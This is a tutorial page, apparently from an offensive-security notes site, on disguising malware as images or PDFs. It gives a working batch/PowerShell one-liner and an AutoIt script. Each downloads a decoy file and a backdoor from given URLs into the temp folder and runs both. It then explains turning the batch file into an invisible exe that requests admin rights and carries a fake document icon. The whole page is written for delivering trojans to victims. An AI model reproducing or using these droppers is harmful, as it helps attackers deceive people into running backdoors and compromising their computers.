search

Embedding malicious files in Images or PDF

hashtag
Embedding Files using batch (First Method)

@echo off

set files='pdf/image_url','url_of_our_evil_file/Backdoor_URL'

powershell "(%files%)|foreach{$fileName='%TEMP%'+(Split-Path -Path $_ -Leaf);(new-object System.Net.WebClient).DownloadFile($_,$fileName);Invoke-Item $fileName;}"

  • Using the following batch script following by the URL's order and delivering to the victim we will see that when the victim opens this file, the pdf/image will pop up first and the evil program will be executed after.

hashtag
Embedding Files using Autoit (Second Method)

#include <StaticConstants.au3>
#include <WindowsConstants.au3>

Local $urls = "image_URL,Backdoor_URL"

Local $urlsArray = StringSplit($urls, ",", 2 )

For $url In $urlsArray
	$sFile = _DownloadFile($url)
	shellExecute($sFile)

Next

Func _DownloadFile($sURL)
    Local $hDownload, $sFile
    $sFile = StringRegExpReplace($sURL, "^.*/", "")
    $sDirectory = @TempDir & $sFile
    $hDownload = InetGet($sURL, $sDirectory, 17, 1)
    InetClose($hDownload)
    Return $sDirectory
EndFunc   ;==>_GetURLImage

  • Use this script and add all the malicious links you want.

  • Once this its compile, when the victims execute the file, it will execute at the same time all the files.

  • This does the same that the first method does but without using batch and uploading straight the icon of the program in the autoit program.

hashtag
Converting Bat to exe

hashtag
Installation

  • Use wine to execute the program in Linux, you can use it in windows as well.

hashtag
Usage

  • Always select one of the invisible options (Windows 64 bits invisible).

  • You can click on Requests Administrator privileges to get access with admin privileges.

  • The Icon option lets you set an Icon to your evil file like pdf, word, etc.

LogoB2E/Bat_To_Exe_Converter.zip at master · tokyoneon/B2EGitHubchevron-right
PreviousCreating TrojansNextChanging Trojans Icon

Last updated